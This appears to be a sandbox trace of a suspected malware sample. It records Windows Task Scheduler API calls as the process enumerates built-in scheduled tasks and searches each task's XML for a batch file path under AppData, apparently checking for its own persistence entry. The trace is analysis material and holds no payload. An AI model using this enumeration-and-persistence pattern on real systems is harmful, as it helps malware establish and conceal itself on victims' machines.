StrStrIW (lpFirst="\r\n\r\n \r\n D:AI(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FR;;;AU)\r\n $(@%systemroot%\\system32\\pstask.dll,-100)\r\n $(@%systemroot%\\system32\\pstask.dll,-101)\r\n $(@%systemroot%\\system32\\pstask.dll,-102)\r\n \\Microsoft\\Windows\\Chkdsk\\ProactiveScan\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n {CF4270F5-2E43-4468-83B3-A8C45BB33EA1}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.290] IUnknown:Release (This=0x929700) returned 0x0 [0163.290] IUnknown:Release (This=0x929580) returned 0x0 [0163.290] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929580) returned 0x0 [0163.293] ITaskFolderCollection:get_Count (in: This=0x929580, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.293] IUnknown:Release (This=0x929580) returned 0x0 [0163.293] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.293] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xb, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.293] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929580) returned 0x0 [0163.304] IRegisteredTaskCollection:get_Count (in: This=0x929580, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.304] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9296f0) returned 0x0 [0163.304] IRegisteredTask:get_Name (in: This=0x9296f0, pName=0xce058 | out: pName=0xce058*="License Validation") returned 0x0 [0163.304] IRegisteredTask:get_Xml (in: This=0x9296f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2014-01-01T00:00:00\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;GRGX;;;SU)(A;;FA;;;S-1-5-80-65843127-2189646064-2697706863-2125155322-3141006483)(A;;FR;;;S-1-5-87-1452649159-2109950929-2856838567-3638795029-1283063528)\r\n $(@%SystemRoot%\\system32\\ClipUp.exe,-102)\r\n $(@%SystemRoot%\\system32\\ClipUp.exe,-100)\r\n $(@%SystemRoot%\\system32\\ClipUp.exe,-101)\r\n \\Microsoft\\Windows\\Clip\\License Validation\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\system32\\ClipUp.exe\r\n -p -s -o\r\n \r\n \r\n") returned 0x0 [0163.307] StrStrIW (lpFirst="\r\n\r\n \r\n 2014-01-01T00:00:00\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;GRGX;;;SU)(A;;FA;;;S-1-5-80-65843127-2189646064-2697706863-2125155322-3141006483)(A;;FR;;;S-1-5-87-1452649159-2109950929-2856838567-3638795029-1283063528)\r\n $(@%SystemRoot%\\system32\\ClipUp.exe,-102)\r\n $(@%SystemRoot%\\system32\\ClipUp.exe,-100)\r\n $(@%SystemRoot%\\system32\\ClipUp.exe,-101)\r\n \\Microsoft\\Windows\\Clip\\License Validation\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\system32\\ClipUp.exe\r\n -p -s -o\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.308] IUnknown:Release (This=0x9296f0) returned 0x0 [0163.308] IUnknown:Release (This=0x929580) returned 0x0 [0163.308] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929580) returned 0x0 [0163.312] ITaskFolderCollection:get_Count (in: This=0x929580, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.312] IUnknown:Release (This=0x929580) returned 0x0 [0163.312] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.312] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.312] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x9295a0) returned 0x0 [0163.318] IRegisteredTaskCollection:get_Count (in: This=0x9295a0, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.318] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929730) returned 0x0 [0163.318] IRegisteredTask:get_Name (in: This=0x929730, pName=0xce058 | out: pName=0xce058*="CreateObjectTask") returned 0x0 [0163.318] IRegisteredTask:get_Xml (in: This=0x929730, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;SY)(A;;FRFX;;;IU)\r\n \\Microsoft\\Windows\\CloudExperienceHost\\CreateObjectTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT30S\r\n true\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n {E4544ABA-62BF-4C54-AAB2-EC246342626C}\r\n \r\n \r\n") returned 0x0 [0163.320] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;SY)(A;;FRFX;;;IU)\r\n \\Microsoft\\Windows\\CloudExperienceHost\\CreateObjectTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT30S\r\n true\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n {E4544ABA-62BF-4C54-AAB2-EC246342626C}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.320] IUnknown:Release (This=0x929730) returned 0x0 [0163.320] IUnknown:Release (This=0x9295a0) returned 0x0 [0163.320] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x9295a0) returned 0x0 [0163.323] ITaskFolderCollection:get_Count (in: This=0x9295a0, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.323] IUnknown:Release (This=0x9295a0) returned 0x0 [0163.323] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.323] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.323] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x9295c0) returned 0x0 [0163.327] IRegisteredTaskCollection:get_Count (in: This=0x9295c0, pCount=0xce048 | out: pCount=0xce048*=3) returned 0x0 [0163.327] IRegisteredTaskCollection:get_Item (in: This=0x9295c0, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929780) returned 0x0 [0163.327] IRegisteredTask:get_Name (in: This=0x929780, pName=0xce058 | out: pName=0xce058*="Consolidator") returned 0x0 [0163.327] IRegisteredTask:get_Xml (in: This=0x929780, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-106)\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-108)\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-107)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2004-01-02T00:00:00\r\n \r\n PT6H\r\n \r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\wsqmcons.exe\r\n \r\n \r\n") returned 0x0 [0163.330] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-106)\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-108)\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-107)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2004-01-02T00:00:00\r\n \r\n PT6H\r\n \r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\wsqmcons.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.330] IUnknown:Release (This=0x929780) returned 0x0 [0163.330] IRegisteredTaskCollection:get_Item (in: This=0x9295c0, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929780) returned 0x0 [0163.330] IRegisteredTask:get_Name (in: This=0x929780, pName=0xce058 | out: pName=0xce058*="KernelCeipTask") returned 0x0 [0163.330] IRegisteredTask:get_Xml (in: This=0x929780, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SDFRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-601)\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-600)\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-602)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\KernelCeipTask\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n SeChangeNotifyPrivilege\r\n \r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n true\r\n IgnoreNew\r\n \r\n 1\r\n PT45M\r\n \r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n {E7ED314F-2816-4C26-AEB5-54A34D02404C}\r\n \r\n \r\n") returned 0x0 [0163.333] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SDFRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-601)\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-600)\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-602)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\KernelCeipTask\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n SeChangeNotifyPrivilege\r\n \r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n true\r\n IgnoreNew\r\n \r\n 1\r\n PT45M\r\n \r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n {E7ED314F-2816-4C26-AEB5-54A34D02404C}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.333] IUnknown:Release (This=0x929780) returned 0x0 [0163.333] IRegisteredTaskCollection:get_Item (in: This=0x9295c0, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929780) returned 0x0 [0163.333] IRegisteredTask:get_Name (in: This=0x929780, pName=0xce058 | out: pName=0xce058*="UsbCeip") returned 0x0 [0163.333] IRegisteredTask:get_Xml (in: This=0x929780, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;S-1-5-87-1060603329-121822201-3452730971-4292368946-61207722)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-601)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-600)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-602)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\UsbCeip\r\n \r\n \r\n \r\n S-1-5-32-544\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n {C27F6B1D-FE0B-45E4-9257-38799FA69BC8}\r\n \r\n \r\n \r\n") returned 0x0 [0163.337] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;S-1-5-87-1060603329-121822201-3452730971-4292368946-61207722)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-601)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-600)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-602)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\UsbCeip\r\n \r\n \r\n \r\n S-1-5-32-544\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n {C27F6B1D-FE0B-45E4-9257-38799FA69BC8}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.337] IUnknown:Release (This=0x929780) returned 0x0 [0163.337] IUnknown:Release (This=0x9295c0) returned 0x0 [0163.337] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x9295c0) returned 0x0 [0163.340] ITaskFolderCollection:get_Count (in: This=0x9295c0, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.340] IUnknown:Release (This=0x9295c0) returned 0x0 [0163.340] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.340] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xe, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.340] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x9295a0) returned 0x0 [0163.344] IRegisteredTaskCollection:get_Count (in: This=0x9295a0, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0163.344] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929730) returned 0x0 [0163.344] IRegisteredTask:get_Name (in: This=0x929730, pName=0xce058 | out: pName=0xce058*="Data Integrity Scan") returned 0x0 [0163.344] IRegisteredTask:get_Xml (in: This=0x929730, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:AI(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FR;;;AU)\r\n $(@%systemroot%\\system32\\discan.dll,-601)\r\n $(@%systemroot%\\system32\\discan.dll,-600)\r\n $(@%systemroot%\\system32\\discan.dll,-602)\r\n \\Microsoft\\Windows\\Data Integrity Scan\\Data Integrity Scan\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n PT0S\r\n IgnoreNew\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2011-01-01T23:00:00\r\n P7D\r\n \r\n 4\r\n \r\n \r\n \r\n \r\n \r\n \r\n false\r\n PT1H\r\n \r\n \r\n \r\n \r\n {DCFD3EA8-D960-4719-8206-490AE315F94F}\r\n \r\n \r\n") returned 0x0 [0163.346] StrStrIW (lpFirst="\r\n\r\n \r\n D:AI(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FR;;;AU)\r\n $(@%systemroot%\\system32\\discan.dll,-601)\r\n $(@%systemroot%\\system32\\discan.dll,-600)\r\n $(@%systemroot%\\system32\\discan.dll,-602)\r\n \\Microsoft\\Windows\\Data Integrity Scan\\Data Integrity Scan\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n PT0S\r\n IgnoreNew\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2011-01-01T23:00:00\r\n P7D\r\n \r\n 4\r\n \r\n \r\n \r\n \r\n \r\n \r\n false\r\n PT1H\r\n \r\n \r\n \r\n \r\n {DCFD3EA8-D960-4719-8206-490AE315F94F}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.347] IUnknown:Release (This=0x929730) returned 0x0 [0163.347] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929730) returned 0x0 [0163.347] IRegisteredTask:get_Name (in: This=0x929730, pName=0xce058 | out: pName=0xce058*="Data Integrity Scan for Crash Recovery") returned 0x0 [0163.347] IRegisteredTask:get_Xml (in: This=0x929730, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:AI(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FR;;;AU)\r\n $(@%systemroot%\\system32\\discan.dll,-601)\r\n $(@%systemroot%\\system32\\discan.dll,-600)\r\n $(@%systemroot%\\system32\\discan.dll,-603)\r\n \\Microsoft\\Windows\\Data Integrity Scan\\Data Integrity Scan for Crash Recovery\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n PT0S\r\n true\r\n IgnoreNew\r\n 5\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT5M\r\n 7508BCA32907950A\r\n \r\n \r\n \r\n \r\n {DCFD3EA8-D960-4719-8206-490AE315F94F}\r\n \r\n \r\n \r\n") returned 0x0 [0163.349] StrStrIW (lpFirst="\r\n\r\n \r\n D:AI(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FR;;;AU)\r\n $(@%systemroot%\\system32\\discan.dll,-601)\r\n $(@%systemroot%\\system32\\discan.dll,-600)\r\n $(@%systemroot%\\system32\\discan.dll,-603)\r\n \\Microsoft\\Windows\\Data Integrity Scan\\Data Integrity Scan for Crash Recovery\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n PT0S\r\n true\r\n IgnoreNew\r\n 5\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT5M\r\n 7508BCA32907950A\r\n \r\n \r\n \r\n \r\n {DCFD3EA8-D960-4719-8206-490AE315F94F}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.350] IUnknown:Release (This=0x929730) returned 0x0 [0163.350] IUnknown:Release (This=0x9295a0) returned 0x0 [0163.350] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x9295a0) returned 0x0 [0163.352] ITaskFolderCollection:get_Count (in: This=0x9295a0, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.352] IUnknown:Release (This=0x9295a0) returned 0x0 [0163.352] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.352] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xf, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.353] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929580) returned 0x0 [0163.355] IRegisteredTaskCollection:get_Count (in: This=0x929580, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.355] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929700) returned 0x0 [0163.355] IRegisteredTask:get_Name (in: This=0x929700, pName=0xce058 | out: pName=0xce058*="ScheduledDefrag") returned 0x0 [0163.355] IRegisteredTask:get_Xml (in: This=0x929700, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:AI(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FR;;;AU)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-800)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-801)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-802)\r\n \\Microsoft\\Windows\\Defrag\\ScheduledDefrag\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\defrag.exe\r\n -c -h -o -$\r\n \r\n \r\n") returned 0x0 [0163.358] StrStrIW (lpFirst="\r\n\r\n \r\n D:AI(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FR;;;AU)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-800)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-801)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-802)\r\n \\Microsoft\\Windows\\Defrag\\ScheduledDefrag\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\defrag.exe\r\n -c -h -o -$\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.358] IUnknown:Release (This=0x929700) returned 0x0 [0163.358] IUnknown:Release (This=0x929580) returned 0x0 [0163.358] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929580) returned 0x0 [0163.361] ITaskFolderCollection:get_Count (in: This=0x929580, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.361] IUnknown:Release (This=0x929580) returned 0x0 [0163.361] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.361] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x10, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.361] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0163.365] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.365] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929710) returned 0x0 [0163.365] IRegisteredTask:get_Name (in: This=0x929710, pName=0xce058 | out: pName=0xce058*="Metadata Refresh") returned 0x0 [0163.365] IRegisteredTask:get_Xml (in: This=0x929710, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FRFX;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\System32\\DeviceSetupManager.dll,-601)\r\n $(@%SystemRoot%\\System32\\DeviceSetupManager.dll,-600)\r\n $(@%SystemRoot%\\System32\\DeviceSetupManager.dll,-602)\r\n \\Microsoft\\Windows\\Device Setup\\Metadata Refresh\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n Parallel\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P10D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n {23C1F3CF-C110-4512-ACA9-7B6174ECE888}\r\n \r\n \r\n") returned 0x0 [0163.367] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FRFX;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\System32\\DeviceSetupManager.dll,-601)\r\n $(@%SystemRoot%\\System32\\DeviceSetupManager.dll,-600)\r\n $(@%SystemRoot%\\System32\\DeviceSetupManager.dll,-602)\r\n \\Microsoft\\Windows\\Device Setup\\Metadata Refresh\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n Parallel\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P10D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n {23C1F3CF-C110-4512-ACA9-7B6174ECE888}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.367] IUnknown:Release (This=0x929710) returned 0x0 [0163.367] IUnknown:Release (This=0x929590) returned 0x0 [0163.367] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0163.370] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.370] IUnknown:Release (This=0x929590) returned 0x0 [0163.370] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.370] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x11, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.371] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x9295a0) returned 0x0 [0163.376] IRegisteredTaskCollection:get_Count (in: This=0x9295a0, pCount=0xce048 | out: pCount=0xce048*=9) returned 0x0 [0163.377] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929740) returned 0x0 [0163.377] IRegisteredTask:get_Name (in: This=0x929740, pName=0xce058 | out: pName=0xce058*="IntegrityCheck") returned 0x0 [0163.377] IRegisteredTask:get_Xml (in: This=0x929740, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\IntegrityCheck\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n 